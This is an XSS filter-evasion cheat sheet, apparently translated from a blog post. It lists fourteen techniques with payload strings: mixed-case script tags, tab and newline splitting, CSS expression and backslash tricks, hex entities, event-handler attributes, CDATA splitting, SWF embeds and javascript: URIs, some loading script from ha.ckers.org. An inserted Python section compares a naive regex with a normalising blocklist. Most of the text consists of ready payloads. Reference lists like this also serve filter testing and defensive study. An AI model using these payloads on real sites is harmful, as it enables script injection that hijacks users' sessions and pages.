1. Change the case of the characters

<sCript>alert('d')</scRipT>
2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" '' SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Replace the .js extension with another extension

<script src="bad.jpg"></script>
4. Put the JavaScript inside a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}
5. Insert other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use tabs or newlines to evade

<img src="jav ascr ipt:alert('XSS3')">   -> tab

<IMG SRC="jav ascript:alert('XSS');">   -> new line
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" can also be dropped)

Encoded (shown decoded): <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Encoded (shown decoded): <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script in an HTML tag (event handler attributes)

<body onload="alert('onload')">

Other event attributes that can be used the same way:
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
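As an added illustration (not code from the original post), the following Python compares a literal, case-sensitive regex with the same blocklist applied after canonicalising the input, using constructed samples of the tricks from sections 1 and 5 to 9; the function and sample names are my own, and the nested-comment string from section 7 is kept to show a case the simple stripper still misses.

```python
import html
import re

# Constructed samples of the evasion tricks catalogued in sections 1 and 5-9
# (cheat-sheet style strings; the alert() text is a placeholder, not a real target).
SAMPLES = {
    "mixed_case":       "<sCript>alert('d')</scRipT>",
    "slash_in_tag":     '<SCRIPT/SRC="t.js"></SCRIPT>',
    "tab_in_keyword":   "<img src=\"jav\tascr\tipt:alert('XSS3')\">",
    "newline":          "<IMG SRC=\"jav\nascript:alert('XSS');\">",
    "css_backslash":    "<DIV STYLE=\"width: expre\\ssi\\on(alert('XSS31'));\">",
    "css_comment":      "<IMG STYLE=\"xss:expr/*anyword*/ession(alert('sss'))\">",
    "hex_no_semicolon": "<IMG SRC=\"&#x6A&#x61&#x76&#x61script:alert('XSS')\">",
    "event_handler":    "<body onload=\"alert('onload')\">",
}
# Section 7's nested-comment trick: a string-unaware comment stripper removes the
# wrong span here, so this sample still gets past the normalised check below.
NESTED_COMMENT = "<A STYLE='no\\xss:noxss(\"*//*\"); xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>"

NAIVE = re.compile(r"<script|javascript:|expression\(")           # literal, case-sensitive
DANGEROUS = re.compile(r"<script|javascript:|expression\(|\bon\w+\s*=")

def naive_filter_flags(s: str) -> bool:
    """The kind of literal regex check the tricks above are written to evade."""
    return NAIVE.search(s) is not None

def normalize(s: str) -> str:
    """Undo the encodings and separators from sections 1, 6, 7 and 8 before scanning."""
    s = html.unescape(s)                         # &#x6A / &#106; entities, ';' optional
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)  # CSS comments splitting a keyword
    s = s.replace("\\", "")                      # CSS backslash escapes (expre\ssion)
    s = re.sub(r"[\t\n\r\x00]", "", s)           # tab / newline / NUL inside keywords
    return s.lower()                             # mixed case (sCript)

def normalized_filter_flags(s: str) -> bool:
    """Same blocklist, but applied to the canonical form of the input."""
    return DANGEROUS.search(normalize(s)) is not None

def evasion_report() -> dict:
    """{sample name: (caught by naive filter, caught after normalisation)}."""
    return {k: (naive_filter_flags(v), normalized_filter_flags(v)) for k, v in SAMPLES.items()}

if __name__ == "__main__":
    for name, (naive, norm) in evasion_report().items():
        print(f"{name:17s} naive={naive!s:5s} normalized={norm}")
    print("nested_comment    naive=%s normalized=%s"
          % (naive_filter_flags(NESTED_COMMENT), normalized_filter_flags(NESTED_COMMENT)))
```

The nested-comment sample is why this stays a detection heuristic: the robust defence against the whole list is context-aware output encoding, not a blocklist.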
10. XSS code embedded in a SWF file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. JavaScript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>